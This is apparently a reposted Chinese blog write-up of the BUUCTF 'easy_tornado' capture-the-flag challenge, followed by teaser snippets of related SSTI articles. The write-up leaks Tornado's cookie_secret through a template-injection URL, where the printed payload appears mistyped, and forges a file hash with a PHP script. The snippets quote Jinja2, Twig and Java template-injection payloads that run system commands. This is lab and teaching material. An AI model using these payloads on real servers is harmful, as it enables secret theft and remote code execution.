有关于服务端模板注入(ssti攻击)——BUUCTF - easy_tornado

最新推荐文章于 2024-05-02 04:10:46 发布
最新推荐文章于 2024-05-02 04:10:46 发布
阅读量1k 收藏 2
点赞数 2
文章标签: php python
原文链接:http://www.cnblogs.com/MisakaYuii-Z/p/11480775.html
版权

打开题目出现3个链接

 

 

/flag.txt 中提示flag in /fllllllllllllag

/welcome.txt 中提示 render

/hints.txt 中提示 md5(cookie_secret+md5(filename))

直接访问/fllllllllllllag失败。

百度了render可知,render是python的一个模板,他们的url都是由filename和filehash组成,filehash即为他们filename的md5值。

当filename或filehash不匹配时,将会跳转到http://fe01b382-7935-4e50-8973-f09a31b53c8f.node1.buuoj.cn/error?msg=Error   页面.

所以想到需要获取cookie_secret来得到filehash

存在msg参数,百度之后发现师傅们可以进行模块注入。尝试了error?msg={{1}},发现的确存在模块注入。

尝试搜索tornado cookie_secret。发现cookie_secret存放在handler.settings中。

于是构建payload

http://fe01b382-7935-4e50-8973-f09a31b53c8f.node1.buuoj.cn/error?msg={{hendler_settings}}

得到'cookie_secret': '2cdad0e1-16ac-4881-861a-daecaa637c2c'

于是用php写代码获取filehash值

<?php
$cookie_secret='2cdad0e1-16ac-4881-861a-daecaa637c2c';
$filename = '/fllllllllllllag';
$go = md5($cookie_secret . md5($filename));
echo $go;
?>
 
再次构建payload
http://fe01b382-7935-4e50-8973-f09a31b53c8f.node1.buuoj.cn/file?filename=/fllllllllllllag&filehash=98b8d02691da0221fc3fc43498a181d4
得到flag

 

 

转载于:https://www.cnblogs.com/MisakaYuii-Z/p/11480775.html

ancan8807
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jinja2模板注入_Flask Jinja2开发中遇到的的服务端注入问题研究
weixin_39575937的博客
01-17 224
原标题:Flask Jinja2开发中遇到的的服务端注入问题研究0×00. 前言作为一个安全工程师,我们有义务去了解漏洞产生的影响,这样才能更好地帮助我们去评估风险值。本篇文章我们将继续研究Flask/Jinja2 开发中遇到的SSTI (服务端模板注入)问题, 如果你从未听过SSTI 或者没有弄清楚它到底是个什么东东,建议您最好先阅读一下。0×01. 测试代码为了更好地演示Flask/Jinja...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接到模板中而不是作为数据传递...
服务器端模板注入
Eason_LYC安全白帽子的成长博客
05-17 1088
服务器端模板注入,是一类注入难度底,但是需要知识面广的一种漏洞。
渗透学习-23- WEB 攻防-Python 考点&amp;CTF 与 CMS-SSTI 模版注入&amp;PYC 反编译
最新发布
2301_76268112的博客
05-02 20
举个例子,我想买裙子,这时候我会打开某宝,直接在搜索框输入“裙子”,就会出现跟裙子相关的一系列商品,各种颜色,各种样式。那我们来想一下,这么多商品的各种信息是直接全部写死在页面上的嘛?那我们每次查找的商品都不一样,需要的内存就太大了很显然,并不是,所以这里就体现了我们模板引擎的作用,它可以根据从数据库中实时提取出来的数据对html页面实时的渲染,这,就是模板引擎。漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,
服务端模板注入:现代WEB远程代码执行(补充翻译和扩展)
weixin_34261739的博客
03-08 476
lupin · 2015/09/02 10:210x00 前言原文链接:www.blackhat.com/docs/us-15/…最近看了这篇文章,其实也不是新技术,但是作者给出的两个攻击案例很不错,看到drops里面有人翻译了这篇文章,但是没有把攻击案例翻译出来,于是把这部分内容补充上。这两个案例分别针对FreeMarker和Velocity,所以把作者针对这两个模板引擎编写Exploit的过程...
服务器模板注入 SSTI (Server-side template injection)
angry_program的博客
08-05 2704
一、服务器模板注入 服务器模板注入(Server-side template injection)是当攻击者能够用本地的模板语法去注入一个恶意的payload,然后再服务器端执行该模板攻击手法。 模板引擎是通过将固定模板与多变数据结合起来生成html网页的一种技术,当用户直接输入数据到模板不作任何过滤的时,可能会发生服务端模板注入攻击。这使得攻击者可以注入任何模板指令来操控服务器模板引擎,从而使整个服务器被控制。 顾名思义,服务器模板注入和SQL注入大同小异,但SSTI是发生在服务器端的,更加危险。
python SSTI tornado render模板注入
qq_45951598的博客
12-17 2352
原理 tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。 简单的理解例子如下: import tornado.ioloop import tornado.web class MainHandler(tornado.web.RequestHandler): def get(self): self.render(
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
例如,攻击者可能会使用以下模板注入payload来寻找可利用的函数: ```python {{ ''.__class__.__mro__[2].__subclasses__()[index].__init__.__globals__['__builtins__']['file']('path/to/file') }} ``` 在这个...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
BUUCTF之[BJDCTF2020]Cookie is so stable ----- SSTI注入
weixin_44632787的博客
06-26 1535
BUUCTF之[BJDCTF2020]Cookie is so stable 题目 知识点:服务端模板注入攻击SSTI里的Twig攻击。从网上找来的图片。参考链接:服务端模板注入攻击 然后网上提示说: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 然后这题是 Twig 模块,用到的payload是: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_sel
服务端模板注入漏洞SSTI
weixin_43873557的博客
02-21 381
所有用户的输入都存在风险 tempalte = "Bio:{{user.bio}}" render(template) 数据交互Bio(user对象的bio属性) 当user.bio是正常输入时,例如:Bio:{{7*7}},那就是正常的显示输入。 当user.bio是恶意输出时,例如:Bio:{{exec(‘ls’)}},就会执行系统命令。 基于python的flask web架构做一个简单的测试。 构造payload {{import os;os.system("id")}} 失败了,这是因为J
服务端模板注入攻击原理以及实战(SSTI
Ba1_Ma0的博客
04-10 3653
什么是模板 简单来说,就是网站内容的动态部分,如果有一个网站的内容几乎相同,但只有某些部分发生改变,那么他们很有可能使用了模板 模板看起来如下: hello{user.name} 他们有一个静态罐和一个动态罐,hello为静态罐,{}里的内容为动态罐 这就是为什么编译器如何是知道该部分是动态的,另外需要注意的是,并非是所有模板看起来都是像上面那样,列如: hello{{user.name}} 这是一个名为jinja模板引擎的示例,用流行的python框架(如django和flask)所使用 什么是模板
BUUCTF SSTI模板注入小结(持续更新)
CN天狼
05-02 1275
BUUCTF部分SSTI模板注入小结 [护网杯 2018]easy_tornado [BJDCTF2020]The mystery of ip [BJDCTF2020]Cookie is so stable [CISCN2019 华东南赛区]Web11 [WesternCTF2018]shrine [GYCTF2020]FlaskApp [CSCCTF 2019 Qual]FlaskLight
buuctf-[Flask]SSTI
m0_62094846的博客
04-22 1095
页面上只有Hello guest,源代码上也是什么都没有,抓包添加XFF也没有改变。 是要GET一个参数name,这个不好想到 顺便确定有SSTI漏洞 <加字母就会被过滤 Smarty中的方法也不能用了 获取eval函数并执行任意python代码的POC {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__i...
buuctf [Flask]SSTI
qq_1873822的博客
03-16 2558
漏洞简介 SSTI服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。 复现过程 访问http://node3.buuoj.cn:29153/?name={{2*2}} 说明SSTI漏洞存在。 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warni
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 2667
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
BUUCTF-Real-[Flask]SSTI
分享
02-02 1182
服务端模板注入SSTI,可进行代码执行操作!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值